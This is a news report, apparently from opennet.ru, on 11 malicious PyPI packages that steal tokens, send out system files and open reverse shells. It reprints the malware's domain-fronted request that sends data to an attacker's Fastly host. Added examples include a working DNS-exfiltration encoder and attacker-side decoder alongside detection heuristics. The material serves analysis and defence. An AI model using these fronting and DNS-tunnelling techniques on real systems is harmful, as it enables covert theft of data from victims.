In the Python Package Index (PyPI), 11 packages containing malicious code have been identified. Before the problem was spotted, the packages had been downloaded about 38 thousand times in total. The malicious packages stand out for the sophisticated techniques they use to hide the communication channels to the attackers' servers.
- importantpackage (6305 downloads), important-package (12897) - established a connection to an external server under the guise of connecting to pypi.python.org, giving the attackers shell access to the system (a reverse shell), and used the TrevorC2 framework to disguise the communication channel.
- pptest (10001), ipboards (946) - used DNS as the communication channel to transmit information about the system (the first package sent the hostname, the working directory and the internal and external IP addresses; the second sent the username and hostname).
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - located the Discord service token on the system and sent it to an external host.
- trrfab (287) - sent the user identifier, the hostname and the contents of /etc/passwd, /etc/hosts and /home to an external host.
- 10Cent10 (490) - established a reverse shell connection to an external host.
- yandex-yt (4183) - displayed a message claiming the system had been compromised and redirected the user to a page with further instructions, served via nda.ya.ru (api.ya.cc).
The most notable technique is the way importantpackage and important-package reach their external hosts: they abuse the Fastly content delivery network that fronts the PyPI repository to disguise their activity. The requests really are sent to the pypi.python.org server (the TLS handshake even names python.org in the SNI), but the HTTP "Host" header carries the name of a server controlled by the attackers (psec.forward.io.global.prod.fastly.net). The CDN then forwards the same request to the attackers' server, while on the wire the data travels inside the TLS connection negotiated for pypi.python.org.
PyPI's infrastructure runs on the Fastly CDN, which uses the Varnish caching proxy to answer common requests from cache and terminates TLS at the CDN edge rather than on the origin servers, so HTTPS requests pass through the proxy. Whatever the intended target, a request first arrives at the proxy, which picks the backend from the HTTP "Host" header; the hostnames of all Fastly customers resolve to the IP addresses of shared CDN load balancers.
The attackers' server is likewise registered with Fastly, which offers free plans to anyone and even allows anonymous sign-up. Note that the reverse shell is also used to deliver requests to the victim, with the attackers' host driving that channel. From the outside, traffic to the attackers' server looks like a legitimate session with the PyPI repository, encrypted under PyPI's TLS certificate. The same technique, known as "domain fronting", was previously widely used to hide hostnames from censorship filters: it exploits the way some CDNs handle HTTPS, presenting a decoy hostname in the SNI while placing the hostname actually requested in the HTTP Host header inside the TLS session.

To disguise the malicious activity, the TrevorC2 framework was used to make the exchange with the server look like ordinary web browsing: for example, the malicious requests were sent under the guise of downloading the image "https://pypi.python.org/images?guid=", with the transmitted data packed into the guid parameter. The request is built roughly as follows (the urllib import is added here for completeness; b64_payload holds the base64-encoded data being sent):

    from urllib import request

    # b64_payload: the collected data, already base64-encoded by the caller
    url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload
    r = request.Request(url, headers={'Host': "psec.forward.io.global.prod.fastly.net"})
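The detection side of the fronting trick described above, as an added example that is not part of the original article and not the malware's own code: given records that pair the SNI from the TLS ClientHello with the Host header seen after decryption (the record layout, the sample entries and the Fastly service-name heuristic are assumptions made for this example; the payload is a constructed string), it flags requests whose Host does not belong to the SNI name and recovers the base64 blob hidden in the "guid" parameter.

```python
# Added example (not from the original article, and not the malware's code):
# spotting the SNI/Host mismatch that domain fronting depends on, and pulling
# the payload out of the fake image download's "guid" parameter.
import base64
import binascii
from urllib.parse import urlsplit

# Constructed log records, as a TLS-inspecting proxy or NDR sensor might emit
# them: the SNI from the ClientHello next to the Host header seen inside the
# decrypted HTTP request. The third record mirrors the behaviour the article
# describes; FAKE_GUID is a made-up payload, not real exfiltrated data.
FAKE_GUID = base64.b64encode(b"host=victim-01").decode("ascii")
SAMPLE_RECORDS = [
    {"sni": "pypi.python.org", "host": "pypi.python.org",
     "url": "https://pypi.python.org/simple/requests/"},
    {"sni": "cdn.example.net", "host": "static.cdn.example.net",   # subdomain: fine
     "url": "https://cdn.example.net/img/logo.png"},
    {"sni": "pypi.python.org", "host": "psec.forward.io.global.prod.fastly.net",
     "url": "https://pypi.python.org/images?guid=" + FAKE_GUID},
]

# Assumption for this example: a Host naming a CDN service endpoint rather
# than a public site is worth a second look on its own.
FASTLY_BACKEND_SUFFIX = ".global.prod.fastly.net"


def same_site(sni: str, host: str) -> bool:
    """True when the names match or one is a subdomain of the other."""
    a = sni.lower().rstrip(".")
    b = host.lower().rstrip(".")
    return a == b or a.endswith("." + b) or b.endswith("." + a)


def fronting_indicators(record: dict) -> list:
    """Reasons this request looks domain-fronted (empty list means clean)."""
    reasons = []
    sni, host = record["sni"], record["host"]
    if not same_site(sni, host):
        reasons.append(f"Host {host!r} does not belong to SNI name {sni!r}")
    if host.lower().endswith(FASTLY_BACKEND_SUFFIX):
        reasons.append("Host is a Fastly service name rather than a public site")
    return reasons


def hidden_guid_payload(url: str):
    """Decode the base64 blob a TrevorC2-style client puts into ?guid=.

    The raw query string is split by hand: urllib's parse_qs would turn a
    literal '+' (a legal base64 character) into a space and break decoding."""
    for part in urlsplit(url).query.split("&"):
        key, _, value = part.partition("=")
        if key != "guid":
            continue
        try:
            return base64.b64decode(value, validate=True)
        except (binascii.Error, ValueError):
            return None
    return None


def scan(records: list) -> list:
    """Return (host, reasons, decoded payload) for every suspicious record."""
    hits = []
    for rec in records:
        reasons = fronting_indicators(rec)
        if reasons:
            hits.append((rec["host"], reasons, hidden_guid_payload(rec["url"])))
    return hits


if __name__ == "__main__":
    for host, reasons, payload in scan(SAMPLE_RECORDS):
        print(host, reasons, payload)
```

On a shared CDN a legitimate Host can occasionally differ from the SNI (one customer's site embedding another's assets), so treat the mismatch as a lead to be combined with an allowlist and with the destination's reputation, not as a verdict on its own; the check only works where the sensor can see the HTTP Host header, that is, after TLS termination.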
The pptest and ipboards packages hid their network activity differently, by encoding the collected data in queries sent to a DNS server. The malware transmits information by issuing DNS requests such as "nu4timjagq4fimbuhe.example.com", in which the data destined for the command server is encoded into the subdomain label (the original report describes the encoding as base64; note, however, that DNS labels are case-insensitive and cannot carry '+', '/' or '=', so tools of this kind rely on a case-insensitive alphabet such as base32, which is also all the sample name above consists of). The attackers receive these messages by controlling the authoritative DNS server for the example.com domain.
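The DNS channel described above, as an added example that is not part of the original article and not the pptest or ipboards code: a client-side encoder that packs data into labels under the attacker's zone, the matching decoder an attacker's authoritative server would run, and a heuristic for resolver logs that flags long, high-entropy, base32-only subdomains. The zone name example.com is the one the article uses; the label limits follow RFC 1035, and the entropy and length thresholds are assumptions chosen for this example.

```python
# Added example (not from the original article, and not the pptest or ipboards
# code): how a DNS exfiltration channel packs data into query names, how the
# attacker's DNS server unpacks it, and a heuristic that flags such names.
import base64
import math
from collections import Counter

EXFIL_DOMAIN = "example.com"   # the attacker-controlled zone named in the article
MAX_LABEL = 63                 # RFC 1035: a single label is at most 63 octets
MAX_NAME = 253                 # practical upper bound for a full query name
B32_ALPHABET = set("abcdefghijklmnopqrstuvwxyz234567")


def encode_query(data: bytes, domain: str = EXFIL_DOMAIN) -> str:
    """Build the query name a DNS-exfil client would look up for `data`.

    base32 is used rather than base64: resolvers fold case and hostnames
    cannot contain '+', '/' or '=', so base64 would be corrupted in transit."""
    blob = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    labels = [blob[i:i + MAX_LABEL] for i in range(0, len(blob), MAX_LABEL)]
    name = ".".join(labels + [domain])
    if len(name) > MAX_NAME:
        raise ValueError("payload too large for one query; split it across queries")
    return name


def decode_query(name: str, domain: str = EXFIL_DOMAIN) -> bytes:
    """What the attacker's authoritative server does with an incoming query."""
    suffix = "." + domain
    name = name.rstrip(".")
    if not name.endswith(suffix):
        raise ValueError("query is not under the exfil domain")
    blob = name[:-len(suffix)].replace(".", "").upper()
    blob += "=" * (-len(blob) % 8)        # restore the padding stripped by the client
    return base64.b32decode(blob)


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of `s` (0.0 for an empty string)."""
    if not s:
        return 0.0
    return -sum(c / len(s) * math.log2(c / len(s)) for c in Counter(s).values())


def looks_like_exfil(name: str, min_chars: int = 16, min_entropy: float = 3.5) -> bool:
    """Heuristic for resolver logs: long, high-entropy, base32-only subdomain.

    Assumes the registrable domain is the last two labels (as in example.com);
    a real deployment should use the public suffix list instead."""
    labels = name.rstrip(".").lower().split(".")
    blob = "".join(labels[:-2])
    return (len(blob) >= min_chars
            and set(blob) <= B32_ALPHABET
            and shannon_entropy(blob) >= min_entropy)


if __name__ == "__main__":
    # Constructed sample: fields of the kind pptest is said to send.
    qname = encode_query(b"user=alice host=dev-box-7")
    print(qname, decode_query(qname))
    for n in ["www.python.org", "nu4timjagq4fimbuhe.example.com", qname]:
        print(n, looks_like_exfil(n))
```

The heuristic on its own will also fire on legitimate machine-generated names (cloud and CDN hostnames, some anti-virus lookup services), so in practice it is combined with per-domain query volume, the number of distinct subdomains seen for a zone, and an allowlist; the encoder shows why a single query carries at most a couple of hundred bytes, which is why such channels issue many lookups for even a small file.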
Source: opennet.ru
